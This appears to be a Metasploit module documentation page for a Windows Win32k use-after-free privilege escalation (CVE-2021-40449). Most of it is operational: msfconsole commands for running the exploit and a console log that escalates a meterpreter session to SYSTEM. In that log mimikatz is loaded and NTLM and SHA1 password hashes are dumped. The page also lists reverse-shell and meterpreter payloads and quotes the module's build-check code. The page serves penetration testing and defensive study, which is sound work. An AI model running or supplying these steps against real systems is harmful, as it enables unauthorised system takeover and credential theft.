Win32k NtGdiResetDC Use After Free Local Privilege Elevation - Metasploit
This page contains detailed information about how to use the exploit/windows/local/cve_2021_40449 metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.
Module Overview
Name: Win32k NtGdiResetDC Use After Free Local Privilege Elevation
Module: exploit/windows/local/cve_2021_40449
Source code: modules/exploits/windows/local/cve_2021_40449.rb
Disclosure date: 2021-10-12
Last modification time: 2021-11-08 16:12:20 +0000
Supported architecture(s): x64
Supported platform(s): Windows
Target service / protocol: -
Target network port(s): -
List of CVEs: CVE-2021-40449
A use after free vulnerability exists in the
NtGdiResetDC()
function of Win32k which can be leveraged
by an attacker to escalate privileges to those of NT
AUTHORITY\SYSTEM
. The flaw exists due to the fact that this
function calls hdcOpenDCW()
, which performs a user mode
callback. During this callback, attackers can call the
NtGdiResetDC()
function again with the same handle as
before, which will result in the PDC object that is
referenced by this handle being freed. The attacker can then
replace the memory referenced by the handle with their own
object, before passing execution back to the original
NtGdiResetDC()
call, which will now use the attacker's
object without appropriate validation. This can then allow
the attacker to manipulate the state of the kernel and,
together with additional exploitation techniques, gain code
execution as NT AUTHORITY\SYSTEM. This module has been
tested to work on Windows 10 x64 RS1 (build 14393) and RS5
(build 17763), however previous versions of Windows 10 will
likely also work.
Module Ranking and Traits
Module Ranking:
- good: The exploit has a default target and it is the "common case" for this type of software (English, Windows 7 for a desktop app, 2012 for server, etc). More information about ranking can be found here.
Reliability:
- repeatable-session: The module is expected to get a shell every time it runs.
Stability:
- crash-os-restarts: Module may crash the OS, but the OS restarts.
Basic Usage
Note: To run a local exploit, make sure you are at the msf prompt.
Also, to check the session ID, use the sessions
command.
msf > use exploit/windows/local/cve_2021_40449
msf exploit(cve_2021_40449) > show targets
... a list of targets ...
msf exploit(cve_2021_40449) > set TARGET target-id
msf exploit(cve_2021_40449) > show options
... show and set options ...
msf exploit(cve_2021_40449) > set SESSION session-id
msf exploit(cve_2021_40449) > exploit
Required Options
- SESSION: The session to run this module on
Knowledge Base
Vulnerable Application
A use after free vulnerability exists in the NtGdiResetDC()
function of Win32k which can be leveraged by
an attacker to escalate privileges to those of NT AUTHORITY\SYSTEM
. The flaw exists due to the fact
that this function calls hdcOpenDCW()
, which performs a user mode callback. During this callback, attackers
can call the NtGdiResetDC()
function again with the same handle as before, which will result in the PDC object
that is referenced by this handle being freed. The attacker can then replace the memory referenced by the handle
with their own object, before passing execution back to the original NtGdiResetDC()
call, which will now use the
attacker's object without appropriate validation. This can then allow the attacker to manipulate the state of the
kernel and, together with additional exploitation techniques, gain code execution as NT AUTHORITY\SYSTEM.
This module has been tested to work on Windows 10 x64 RS1 (build 14393) and RS5 (build 17763), however previous versions of Windows 10 will likely also work.
Note the exploit may occasionally not work the first time so you may have to run it again to get the results.
Verification Steps
- Get a non-SYSTEM meterpreter session on Win10 RS5 x64
use exploit/windows/local/cve_2021_40449
set session <session>
exploit
- Get a SYSTEM session
Scenarios
Windows 10 1809 Build 17763.2114 x64
msf6 exploit(multi/handler) > exploit
[*] Started bind TCP handler against 172.28.156.210:4444
[*] Sending stage (200262 bytes) to 172.28.156.210
[*] Meterpreter session 1 opened (172.28.145.185:36167 -> 172.28.156.210:4444 ) at 2021-11-05 15:45:08 -0500
meterpreter > getuid
Server username: DESKTOP-3GHNQ93\normal
meterpreter > getsystem
[-] priv_elevate_getsystem: Operation failed: The system cannot find the file specified. The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)
[-] Named Pipe Impersonation (RPCSS variant)
meterpreter > sysinfo
Computer : DESKTOP-3GHNQ93
OS : Windows 10 (10.0 Build 17763).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x64/windows
meterpreter > background
[*] Backgrounding session 1...
msf6 exploit(multi/handler) > use exploit/windows/local/cve_2021_40449
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/local/cve_2021_40449) > show options
Module options (exploit/windows/local/cve_2021_40449):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on
Payload options (windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 172.28.145.185 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Windows 10 x64 RS1 (build 14393) and RS5 (build 17763)
msf6 exploit(windows/local/cve_2021_40449) > set SESSION 1
SESSION => 1
msf6 exploit(windows/local/cve_2021_40449) > set LPORT 9988
LPORT => 9988
msf6 exploit(windows/local/cve_2021_40449) > exploit
[!] SESSION may not be compatible with this module:
[!] * missing Meterpreter features: stdapi_sys_process_set_term_size
[*] Started reverse TCP handler on 172.28.145.185:9988
[*] Running automatic check ("set AutoCheck false" to disable)
^C[-] Exploit failed [user-interrupt]: Interrupt
[-] exploit: Interrupted
msf6 exploit(windows/local/cve_2021_40449) > exploit
[!] SESSION may not be compatible with this module:
[!] * missing Meterpreter features: stdapi_sys_process_set_term_size
[*] Started reverse TCP handler on 172.28.145.185:9988
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Target's build number: 10.0.17763.2114
[+] The target appears to be vulnerable. Vulnerable Windows 10 v1809 build detected!
[*] Launching msiexec to host the DLL...
[+] Process 2520 launched.
[*] Reflectively injecting the DLL into 2520...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (200262 bytes) to 172.28.156.210
[*] Meterpreter session 2 opened (172.28.145.185:9988 -> 172.28.156.210:49900 ) at 2021-11-05 15:46:21 -0500
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > load kiwi
Loading extension kiwi...c
.#####. mimikatz 2.2.0 20191125 (x64/windows)
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \ / ## > http://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > http://pingcastle.com / http://mysmartlogon.com ***/
Success.
meterpreter > creds_all
[+] Running as SYSTEM
[*] Retrieving all credentials
msv credentials
===============
Username Domain NTLM SHA1
-------- ------ ---- ----
normal DESKTOP-3GHNQ93 a38673ad58b19421e952fc317b62c3c4 ccff8cc980f0024dc5b3f925194a35c0fa0231c3
test DESKTOP-3GHNQ93 0cb6948805f797bf2a82807973b89537 87f8ed9157125ffc4da9e06a7b8011ad80a53fe1
wdigest credentials
===================
Username Domain Password
-------- ------ --------
(null) (null) (null)
DESKTOP-3GHNQ93$ WORKGROUP (null)
normal DESKTOP-3GHNQ93 (null)
test DESKTOP-3GHNQ93 (null)
kerberos credentials
====================
Username Domain Password
-------- ------ --------
(null) (null) (null)
desktop-3ghnq93$ WORKGROUP (null)
normal DESKTOP-3GHNQ93 (null)
test DESKTOP-3GHNQ93 (null)
meterpreter >
Go back to menu.
Msfconsole Usage
Here is how the windows/local/cve_2021_40449 exploit module looks in the msfconsole:
msf6 > use exploit/windows/local/cve_2021_40449
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/local/cve_2021_40449) > show info
Name: Win32k NtGdiResetDC Use After Free Local Privilege Elevation
Module: exploit/windows/local/cve_2021_40449
Platform: Windows
Arch: x64
Privileged: No
License: Metasploit Framework License (BSD)
Rank: Good
Disclosed: 2021-10-12
Provided by:
IronHusky
Costin Raiu
Boris Larin
Red Raindrop Team of Qi'anxin Threat Intelligence Center
KaLendsi
ly4k
Grant Willcox
Module stability:
crash-os-restarts
Module reliability:
repeatable-session
Available targets:
Id Name
-- ----
0 Windows 10 x64 RS1 (build 14393) and RS5 (build 17763)
Check supported:
Yes
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on
Payload information:
Description:
A use after free vulnerability exists in the `NtGdiResetDC()`
function of Win32k which can be leveraged by an attacker to escalate
privileges to those of `NT AUTHORITY\SYSTEM`. The flaw exists due to
the fact that this function calls `hdcOpenDCW()`, which performs a
user mode callback. During this callback, attackers can call the
`NtGdiResetDC()` function again with the same handle as before,
which will result in the PDC object that is referenced by this
handle being freed. The attacker can then replace the memory
referenced by the handle with their own object, before passing
execution back to the original `NtGdiResetDC()` call, which will now
use the attacker's object without appropriate validation. This can
then allow the attacker to manipulate the state of the kernel and,
together with additional exploitation techniques, gain code
execution as NT AUTHORITY\SYSTEM. This module has been tested to
work on Windows 10 x64 RS1 (build 14393) and RS5 (build 17763),
however previous versions of Windows 10 will likely also work.
References:
https://nvd.nist.gov/vuln/detail/CVE-2021-40449
https://securelist.com/mysterysnail-attacks-with-windows-zero-day/104509/
https://mp.weixin.qq.com/s/AcFS0Yn9SDuYxFnzbBqhkQ
https://github.com/KaLendsi/CVE-2021-40449-Exploit
https://github.com/ly4k/CallbackHell
Module Options
This is a complete list of options available in the windows/local/cve_2021_40449 exploit:
msf6 exploit(windows/local/cve_2021_40449) > show options
Module options (exploit/windows/local/cve_2021_40449):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on
Payload options (windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.204.129 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Windows 10 x64 RS1 (build 14393) and RS5 (build 17763)
Advanced Options
Here is a complete list of advanced options supported by the windows/local/cve_2021_40449 exploit:
msf6 exploit(windows/local/cve_2021_40449) > show advanced
Module advanced options (exploit/windows/local/cve_2021_40449):
Name Current Setting Required Description
---- --------------- -------- -----------
AutoCheck true no Run check before exploit
ContextInformationFile no The information file that contains context information
DisablePayloadHandler false no Disable the handler code for the selected payload
EnableContextEncoding false no Use transient context when encoding payloads
ForceExploit false no Override check result
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
WfsDelay 2 no Additional delay in seconds to wait for a session
Payload advanced options (windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
AutoLoadStdapi true yes Automatically load the Stdapi extension
AutoRunScript no A script to run automatically on session creation.
AutoSystemInfo true yes Automatically capture system information on initialization.
AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process
AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds
EnableStageEncoding false no Encode the second stage payload
EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal
HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
PayloadProcessCommandLine no The displayed command line that will be used by the payload
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
PingbackRetries 0 yes How many additional successful pingbacks
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
PrependMigrate false yes Spawns and runs shellcode in new process
PrependMigrateProc no Process to spawn and run shellcode in
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
ReverseListenerBindAddress no The specific IP address to bind to on the local system
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
ReverseListenerComm no The specific communication channel to use for this listener
ReverseListenerThreaded false yes Handle every connection in a new thread (experimental)
SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed
SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down
SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure
SessionRetryWait 10 no Number of seconds to wait between reconnect attempts
StageEncoder no Encoder to use if EnableStageEncoding is set
StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set
StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible
StagerRetryCount 10 no The number of times the stager should retry if the first connect fails
StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
Exploit Targets
Here is a list of targets (platforms and systems) which the windows/local/cve_2021_40449 module can exploit:
msf6 exploit(windows/local/cve_2021_40449) > show targets
Exploit targets:
Id Name
-- ----
0 Windows 10 x64 RS1 (build 14393) and RS5 (build 17763)
Compatible Payloads
This is a list of possible payloads which can be delivered and executed on the target system using the windows/local/cve_2021_40449 exploit:
msf6 exploit(windows/local/cve_2021_40449) > show payloads
Compatible Payloads
===================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 payload/generic/custom normal No Custom Payload
1 payload/generic/shell_bind_tcp normal No Generic Command Shell, Bind TCP Inline
2 payload/generic/shell_reverse_tcp normal No Generic Command Shell, Reverse TCP Inline
3 payload/windows/x64/exec normal No Windows x64 Execute Command
4 payload/windows/x64/loadlibrary normal No Windows x64 LoadLibrary Path
5 payload/windows/x64/messagebox normal No Windows MessageBox x64
6 payload/windows/x64/meterpreter/bind_ipv6_tcp normal No Windows Meterpreter (Reflective Injection x64), Windows x64 IPv6 Bind TCP Stager
7 payload/windows/x64/meterpreter/bind_ipv6_tcp_uuid normal No Windows Meterpreter (Reflective Injection x64), Windows x64 IPv6 Bind TCP Stager with UUID Support
8 payload/windows/x64/meterpreter/bind_named_pipe normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Bind Named Pipe Stager
9 payload/windows/x64/meterpreter/bind_tcp normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Bind TCP Stager
10 payload/windows/x64/meterpreter/bind_tcp_rc4 normal No Windows Meterpreter (Reflective Injection x64), Bind TCP Stager (RC4 Stage Encryption, Metasm)
11 payload/windows/x64/meterpreter/bind_tcp_uuid normal No Windows Meterpreter (Reflective Injection x64), Bind TCP Stager with UUID Support (Windows x64)
12 payload/windows/x64/meterpreter/reverse_http normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTP Stager (wininet)
13 payload/windows/x64/meterpreter/reverse_https normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTP Stager (wininet)
14 payload/windows/x64/meterpreter/reverse_named_pipe normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse Named Pipe (SMB) Stager
15 payload/windows/x64/meterpreter/reverse_tcp normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse TCP Stager
16 payload/windows/x64/meterpreter/reverse_tcp_rc4 normal No Windows Meterpreter (Reflective Injection x64), Reverse TCP Stager (RC4 Stage Encryption, Metasm)
17 payload/windows/x64/meterpreter/reverse_tcp_uuid normal No Windows Meterpreter (Reflective Injection x64), Reverse TCP Stager with UUID Support (Windows x64)
18 payload/windows/x64/meterpreter/reverse_winhttp normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTP Stager (winhttp)
19 payload/windows/x64/meterpreter/reverse_winhttps normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTPS Stager (winhttp)
20 payload/windows/x64/meterpreter_bind_named_pipe normal No Windows Meterpreter Shell, Bind Named Pipe Inline (x64)
21 payload/windows/x64/meterpreter_bind_tcp normal No Windows Meterpreter Shell, Bind TCP Inline (x64)
22 payload/windows/x64/meterpreter_reverse_http normal No Windows Meterpreter Shell, Reverse HTTP Inline (x64)
23 payload/windows/x64/meterpreter_reverse_https normal No Windows Meterpreter Shell, Reverse HTTPS Inline (x64)
24 payload/windows/x64/meterpreter_reverse_ipv6_tcp normal No Windows Meterpreter Shell, Reverse TCP Inline (IPv6) (x64)
25 payload/windows/x64/meterpreter_reverse_tcp normal No Windows Meterpreter Shell, Reverse TCP Inline x64
26 payload/windows/x64/peinject/bind_ipv6_tcp normal No Windows Inject Reflective PE Files, Windows x64 IPv6 Bind TCP Stager
27 payload/windows/x64/peinject/bind_ipv6_tcp_uuid normal No Windows Inject Reflective PE Files, Windows x64 IPv6 Bind TCP Stager with UUID Support
28 payload/windows/x64/peinject/bind_named_pipe normal No Windows Inject Reflective PE Files, Windows x64 Bind Named Pipe Stager
29 payload/windows/x64/peinject/bind_tcp normal No Windows Inject Reflective PE Files, Windows x64 Bind TCP Stager
30 payload/windows/x64/peinject/bind_tcp_rc4 normal No Windows Inject Reflective PE Files, Bind TCP Stager (RC4 Stage Encryption, Metasm)
31 payload/windows/x64/peinject/bind_tcp_uuid normal No Windows Inject Reflective PE Files, Bind TCP Stager with UUID Support (Windows x64)
32 payload/windows/x64/peinject/reverse_named_pipe normal No Windows Inject Reflective PE Files, Windows x64 Reverse Named Pipe (SMB) Stager
33 payload/windows/x64/peinject/reverse_tcp normal No Windows Inject Reflective PE Files, Windows x64 Reverse TCP Stager
34 payload/windows/x64/peinject/reverse_tcp_rc4 normal No Windows Inject Reflective PE Files, Reverse TCP Stager (RC4 Stage Encryption, Metasm)
35 payload/windows/x64/peinject/reverse_tcp_uuid normal No Windows Inject Reflective PE Files, Reverse TCP Stager with UUID Support (Windows x64)
36 payload/windows/x64/pingback_reverse_tcp normal No Windows x64 Pingback, Reverse TCP Inline
37 payload/windows/x64/powershell_bind_tcp normal No Windows Interactive Powershell Session, Bind TCP
38 payload/windows/x64/powershell_reverse_tcp normal No Windows Interactive Powershell Session, Reverse TCP
39 payload/windows/x64/shell/bind_ipv6_tcp normal No Windows x64 Command Shell, Windows x64 IPv6 Bind TCP Stager
40 payload/windows/x64/shell/bind_ipv6_tcp_uuid normal No Windows x64 Command Shell, Windows x64 IPv6 Bind TCP Stager with UUID Support
41 payload/windows/x64/shell/bind_named_pipe normal No Windows x64 Command Shell, Windows x64 Bind Named Pipe Stager
42 payload/windows/x64/shell/bind_tcp normal No Windows x64 Command Shell, Windows x64 Bind TCP Stager
43 payload/windows/x64/shell/bind_tcp_rc4 normal No Windows x64 Command Shell, Bind TCP Stager (RC4 Stage Encryption, Metasm)
44 payload/windows/x64/shell/bind_tcp_uuid normal No Windows x64 Command Shell, Bind TCP Stager with UUID Support (Windows x64)
45 payload/windows/x64/shell/reverse_tcp normal No Windows x64 Command Shell, Windows x64 Reverse TCP Stager
46 payload/windows/x64/shell/reverse_tcp_rc4 normal No Windows x64 Command Shell, Reverse TCP Stager (RC4 Stage Encryption, Metasm)
47 payload/windows/x64/shell/reverse_tcp_uuid normal No Windows x64 Command Shell, Reverse TCP Stager with UUID Support (Windows x64)
48 payload/windows/x64/shell_bind_tcp normal No Windows x64 Command Shell, Bind TCP Inline
49 payload/windows/x64/shell_reverse_tcp normal No Windows x64 Command Shell, Reverse TCP Inline
50 payload/windows/x64/vncinject/bind_ipv6_tcp normal No Windows x64 VNC Server (Reflective Injection), Windows x64 IPv6 Bind TCP Stager
51 payload/windows/x64/vncinject/bind_ipv6_tcp_uuid normal No Windows x64 VNC Server (Reflective Injection), Windows x64 IPv6 Bind TCP Stager with UUID Support
52 payload/windows/x64/vncinject/bind_named_pipe normal No Windows x64 VNC Server (Reflective Injection), Windows x64 Bind Named Pipe Stager
53 payload/windows/x64/vncinject/bind_tcp normal No Windows x64 VNC Server (Reflective Injection), Windows x64 Bind TCP Stager
54 payload/windows/x64/vncinject/bind_tcp_rc4 normal No Windows x64 VNC Server (Reflective Injection), Bind TCP Stager (RC4 Stage Encryption, Metasm)
55 payload/windows/x64/vncinject/bind_tcp_uuid normal No Windows x64 VNC Server (Reflective Injection), Bind TCP Stager with UUID Support (Windows x64)
56 payload/windows/x64/vncinject/reverse_http normal No Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTP Stager (wininet)
57 payload/windows/x64/vncinject/reverse_https normal No Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTP Stager (wininet)
58 payload/windows/x64/vncinject/reverse_tcp normal No Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse TCP Stager
59 payload/windows/x64/vncinject/reverse_tcp_rc4 normal No Windows x64 VNC Server (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption, Metasm)
60 payload/windows/x64/vncinject/reverse_tcp_uuid normal No Windows x64 VNC Server (Reflective Injection), Reverse TCP Stager with UUID Support (Windows x64)
61 payload/windows/x64/vncinject/reverse_winhttp normal No Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTP Stager (winhttp)
62 payload/windows/x64/vncinject/reverse_winhttps normal No Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTPS Stager (winhttp)
Evasion Options
Here is the full list of possible evasion options supported by the windows/local/cve_2021_40449 exploit in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):
msf6 exploit(windows/local/cve_2021_40449) > show evasion
Module evasion options:
Name Current Setting Required Description
---- --------------- -------- -----------
Go back to menu.
Error Messages
This module may fail with the following error messages:
- Target is not a Windows system, so it is not affected by this vulnerability!
- Couldn't retrieve the target's build number!
- Target is not running a vulnerable version of Windows!
- Vulnerable Windows 11 build detected!
- Vulnerable Windows Server 2022 build detected!
- Vulnerable Windows 10 21H2 build detected!
- Vulnerable Windows 10 21H1 build detected!
- Vulnerable Windows 10 20H2 build detected!
- Vulnerable Windows 10 20H1 build detected!
- Vulnerable Windows 10 v1909 build detected!
- Vulnerable Windows 10 v1903 build detected!
- Vulnerable Windows 10 v1809 build detected!
- Vulnerable Windows 10 v1803 build detected!
- Vulnerable Windows 10 v1709 build detected!
- Vulnerable Windows 10 v1703 build detected!
- Vulnerable Windows 10 v1607 build detected!
- Vulnerable Windows 10 v1511 build detected!
- Vulnerable Windows 10 v1507 build detected!
- Vulnerable Windows 8.1/Windows Server 2012 R2 build detected!
- Vulnerable Windows 8/Windows Server 2012 build detected!
- Vulnerable Windows 7/Windows Server 2008 R2 build detected!
- Vulnerable Windows Server 2008/Windows Server 2008 SP2 build detected!
- The build number of the target machine does not appear to be a vulnerable version!
- Session is already elevated
- Running against WOW64 is not supported
- Session host is x64, but the target is specified as x86
- Session host is x86, but the target is specified as x64
Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.
Target is not a Windows system, so it is not affected by this vulnerability!
Here is a relevant code snippet related to the "Target is not a Windows system, so it is not affected by this vulnerability!" error message:
75: def check
76: sysinfo_value = sysinfo['OS']
77:
78: if sysinfo_value !~ /windows/i
79: # Non-Windows systems are definitely not affected.
80: return CheckCode::Safe('Target is not a Windows system, so it is not affected by this vulnerability!')
81: end
82:
83: build_num_raw = cmd_exec('cmd.exe /c ver')
84: build_num = build_num_raw.match(/\d+\.\d+\.\d+\.\d+/)
85: if build_num.nil?
Couldn't retrieve the target's build number!
Here is a relevant code snippet related to the "Couldn't retrieve the target's build number!" error message:
81: end
82:
83: build_num_raw = cmd_exec('cmd.exe /c ver')
84: build_num = build_num_raw.match(/\d+\.\d+\.\d+\.\d+/)
85: if build_num.nil?
86: print_error("Couldn't retrieve the target's build number!")
87: else
88: build_num = build_num_raw.match(/\d+\.\d+\.\d+\.\d+/)[0]
89: print_status("Target's build number: #{build_num}")
90: end
91:
Target is not running a vulnerable version of Windows!
Here is a relevant code snippet related to the "Target is not running a vulnerable version of Windows!" error message:
89: print_status("Target's build number: #{build_num}")
90: end
91:
92: # see https://docs.microsoft.com/en-us/windows/release-information/
93: unless sysinfo_value =~ /(7|8|8\.1|10|2008|2012|2016|2019|1803|1809|1903)/
94: return CheckCode::Safe('Target is not running a vulnerable version of Windows!')
95: end
96:
97: build_num_gemversion = Rex::Version.new(build_num)
98:
99: # Build numbers taken from https://www.qualys.com/research/security-alerts/2021-10-12/microsoft/
Vulnerable Windows 11 build detected!
Here is a relevant code snippet related to the "Vulnerable Windows 11 build detected!" error message:
96:
97: build_num_gemversion = Rex::Version.new(build_num)
98:
99: # Build numbers taken from https://www.qualys.com/research/security-alerts/2021-10-12/microsoft/
100: if (build_num_gemversion >= Rex::Version.new('10.0.22000.0')) && (build_num_gemversion < Rex::Version.new('10.0.22000.258')) # Windows 11
101: return CheckCode::Appears('Vulnerable Windows 11 build detected!')
102: elsif (build_num_gemversion >= Rex::Version.new('10.0.20348.0')) && (build_num_gemversion < Rex::Version.new('10.0.20348.288')) # Windows Server 2022
103: return CheckCode::Appears('Vulnerable Windows Server 2022 build detected!')
104: elsif (build_num_gemversion >= Rex::Version.new('10.0.19044.0')) && (build_num_gemversion < Rex::Version.new('10.0.19044.1319')) # Windows 10 21H2
105: return CheckCode::Appears('Vulnerable Windows 10 21H2 build detected!')
106: elsif (build_num_gemversion >= Rex::Version.new('10.0.19043.0')) && (build_num_gemversion < Rex::Version.new('10.0.19043.1288')) # Windows 10 21H1
Vulnerable Windows Server 2022 build detected!
Here is a relevant code snippet related to the "Vulnerable Windows Server 2022 build detected!" error message:
98:
99: # Build numbers taken from https://www.qualys.com/research/security-alerts/2021-10-12/microsoft/
100: if (build_num_gemversion >= Rex::Version.new('10.0.22000.0')) && (build_num_gemversion < Rex::Version.new('10.0.22000.258')) # Windows 11
101: return CheckCode::Appears('Vulnerable Windows 11 build detected!')
102: elsif (build_num_gemversion >= Rex::Version.new('10.0.20348.0')) && (build_num_gemversion < Rex::Version.new('10.0.20348.288')) # Windows Server 2022
103: return CheckCode::Appears('Vulnerable Windows Server 2022 build detected!')
104: elsif (build_num_gemversion >= Rex::Version.new('10.0.19044.0')) && (build_num_gemversion < Rex::Version.new('10.0.19044.1319')) # Windows 10 21H2
105: return CheckCode::Appears('Vulnerable Windows 10 21H2 build detected!')
106: elsif (build_num_gemversion >= Rex::Version.new('10.0.19043.0')) && (build_num_gemversion < Rex::Version.new('10.0.19043.1288')) # Windows 10 21H1
107: return CheckCode::Appears('Vulnerable Windows 10 21H1 build detected!')
108: elsif (build_num_gemversion >= Rex::Version.new('10.0.19042.0')) && (build_num_gemversion < Rex::Version.new('10.0.19042.1288')) # Windows 10 20H2
Vulnerable Windows 10 21H2 build detected!
Here is a relevant code snippet related to the "Vulnerable Windows 10 21H2 build detected!" error message:
100: if (build_num_gemversion >= Rex::Version.new('10.0.22000.0')) && (build_num_gemversion < Rex::Version.new('10.0.22000.258')) # Windows 11
101: return CheckCode::Appears('Vulnerable Windows 11 build detected!')
102: elsif (build_num_gemversion >= Rex::Version.new('10.0.20348.0')) && (build_num_gemversion < Rex::Version.new('10.0.20348.288')) # Windows Server 2022
103: return CheckCode::Appears('Vulnerable Windows Server 2022 build detected!')
104: elsif (build_num_gemversion >= Rex::Version.new('10.0.19044.0')) && (build_num_gemversion < Rex::Version.new('10.0.19044.1319')) # Windows 10 21H2
105: return CheckCode::Appears('Vulnerable Windows 10 21H2 build detected!')
106: elsif (build_num_gemversion >= Rex::Version.new('10.0.19043.0')) && (build_num_gemversion < Rex::Version.new('10.0.19043.1288')) # Windows 10 21H1
107: return CheckCode::Appears('Vulnerable Windows 10 21H1 build detected!')
108: elsif (build_num_gemversion >= Rex::Version.new('10.0.19042.0')) && (build_num_gemversion < Rex::Version.new('10.0.19042.1288')) # Windows 10 20H2
109: return CheckCode::Appears('Vulnerable Windows 10 20H2 build detected!')
110: elsif (build_num_gemversion >= Rex::Version.new('10.0.19041.0')) && (build_num_gemversion < Rex::Version.new('10.0.19041.1288')) # Windows 10 20H1
Vulnerable Windows 10 21H1 build detected!
Here is a relevant code snippet related to the "Vulnerable Windows 10 21H1 build detected!" error message:
102: elsif (build_num_gemversion >= Rex::Version.new('10.0.20348.0')) && (build_num_gemversion < Rex::Version.new('10.0.20348.288')) # Windows Server 2022
103: return CheckCode::Appears('Vulnerable Windows Server 2022 build detected!')
104: elsif (build_num_gemversion >= Rex::Version.new('10.0.19044.0')) && (build_num_gemversion < Rex::Version.new('10.0.19044.1319')) # Windows 10 21H2
105: return CheckCode::Appears('Vulnerable Windows 10 21H2 build detected!')
106: elsif (build_num_gemversion >= Rex::Version.new('10.0.19043.0')) && (build_num_gemversion < Rex::Version.new('10.0.19043.1288')) # Windows 10 21H1
107: return CheckCode::Appears('Vulnerable Windows 10 21H1 build detected!')
108: elsif (build_num_gemversion >= Rex::Version.new('10.0.19042.0')) && (build_num_gemversion < Rex::Version.new('10.0.19042.1288')) # Windows 10 20H2
109: return CheckCode::Appears('Vulnerable Windows 10 20H2 build detected!')
110: elsif (build_num_gemversion >= Rex::Version.new('10.0.19041.0')) && (build_num_gemversion < Rex::Version.new('10.0.19041.1288')) # Windows 10 20H1
111: return CheckCode::Appears('Vulnerable Windows 10 20H1 build detected!')
112: elsif (build_num_gemversion >= Rex::Version.new('10.0.18363.0')) && (build_num_gemversion < Rex::Version.new('10.0.18363.1854')) # Windows 10 v1909
Vulnerable Windows 10 20H2 build detected!
Here is a relevant code snippet related to the "Vulnerable Windows 10 20H2 build detected!" error message:
104: elsif (build_num_gemversion >= Rex::Version.new('10.0.19044.0')) && (build_num_gemversion < Rex::Version.new('10.0.19044.1319')) # Windows 10 21H2
105: return CheckCode::Appears('Vulnerable Windows 10 21H2 build detected!')
106: elsif (build_num_gemversion >= Rex::Version.new('10.0.19043.0')) && (build_num_gemversion < Rex::Version.new('10.0.19043.1288')) # Windows 10 21H1
107: return CheckCode::Appears('Vulnerable Windows 10 21H1 build detected!')
108: elsif (build_num_gemversion >= Rex::Version.new('10.0.19042.0')) && (build_num_gemversion < Rex::Version.new('10.0.19042.1288')) # Windows 10 20H2
109: return CheckCode::Appears('Vulnerable Windows 10 20H2 build detected!')
110: elsif (build_num_gemversion >= Rex::Version.new('10.0.19041.0')) && (build_num_gemversion < Rex::Version.new('10.0.19041.1288')) # Windows 10 20H1
111: return CheckCode::Appears('Vulnerable Windows 10 20H1 build detected!')
